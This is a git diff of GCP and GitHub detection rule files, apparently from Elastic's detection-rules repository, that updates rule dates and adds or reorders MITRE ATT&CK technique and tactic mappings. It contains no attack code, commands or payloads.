+[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml index 66e67424205..b73908983d6 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,49 @@ event.dataset:gcp.audit and event.action:"storage.setIamPermissions" and event.o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml index 49efa174d6f..53b59b684e5 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,19 +82,31 @@ event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.ou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml index 8ae59e5172f..2c3215cd61f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,19 +83,28 @@ event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or "beta.comp [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml index 2dbfe20dffd..535b01be892 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,19 +83,28 @@ event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml index cff4a666a38..54b9bf8b324 100644 --- a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml +++ b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,31 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Updat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml index d26fdfad9fe..062541f2343 100644 --- a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml +++ b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,26 +82,54 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml index 6ba99513f42..5b663d18ff7 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -63,11 +63,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +90,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml index c151731755a..406d9c424c4 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -63,11 +63,42 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +108,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml index 0474776c35d..871858777f2 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -62,11 +62,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,14 +72,14 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -95,9 +90,24 @@ id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -106,12 +116,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml index 6060132006a..6d3e2886d52 100644 --- a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml +++ b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,14 +86,26 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml index 84d9cc8278b..c4c1bd5488b 100644 --- a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml +++ b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/gcp/persistence_gcp_service_account_created.toml b/rules/integrations/gcp/persistence_gcp_service_account_created.toml index 64c798841be..176344f20a5 100644 --- a/rules/integrations/gcp/persistence_gcp_service_account_created.toml +++ b/rules/integrations/gcp/persistence_gcp_service_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml index 5bf9ba190ef..f480ad701fe 100644 --- a/rules/integrations/github/execution_github_app_deleted.toml +++ b/rules/integrations/github/execution_github_app_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -67,14 +67,31 @@ configuration where event.dataset == "github.audit" and github.category == "inte [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml index 723fabe54ae..09f3929e3ab 100644 --- a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml +++ b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,17 +72,34 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.threshold] field = ["github.hashed_token"] value = 1 diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml index d7a9a7fb68d..d7660e1b6ad 100644 --- a/rules/integrations/github/execution_new_github_app_installed.toml +++ b/rules/integrations/github/execution_new_github_app_installed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,14 +72,39 @@ configuration where event.dataset == "github.audit" and event.action == "integra [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1072" name = "Software Deployment Tools" reference = "https://attack.mitre.org/techniques/T1072/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1199" +name = "Trusted Relationship" +reference = "https://attack.mitre.org/techniques/T1199/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml index b0f024d3a6b..3832a15240f 100644 --- a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml +++ b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,3 +109,21 @@ reference = "https://attack.mitre.org/techniques/T1567/001/" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml index 46b687e9fdb..f93858e672e 100644 --- a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml +++ b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2025/12/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -50,6 +50,16 @@ reference = "https://attack.mitre.org/tactics/TA0040/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" @@ -78,6 +88,23 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["source.ip", "github.repo"] diff --git a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml index 56e1f025d29..ce69ec2c81b 100644 --- a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,6 +98,16 @@ id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml index 3273c4e208e..f7975e32147 100644 --- a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,6 +99,16 @@ id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml index 46a8c27fb5d..db556bfbf9b 100644 --- a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml @@ -4,7 +4,7 @@ integration = ["github"] maturity = "production" min_stack_comments = "mv_contains ES|QL function only available post 9.2 in tech preview" min_stack_version = "9.2.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,6 +103,16 @@ id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml index 59d99cbea86..dd4d72e5c96 100644 --- a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml +++ b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/09" integration = ["github"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,10 +84,12 @@ event.dataset: "github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" @@ -100,6 +102,7 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -110,6 +113,23 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.new_terms] field = "new_terms_fields" value = ["github.org_id", "github.repo"] diff --git a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml index 15f2ba57bd8..80af6816d13 100644 --- a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml +++ b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["github"] maturity = "production" 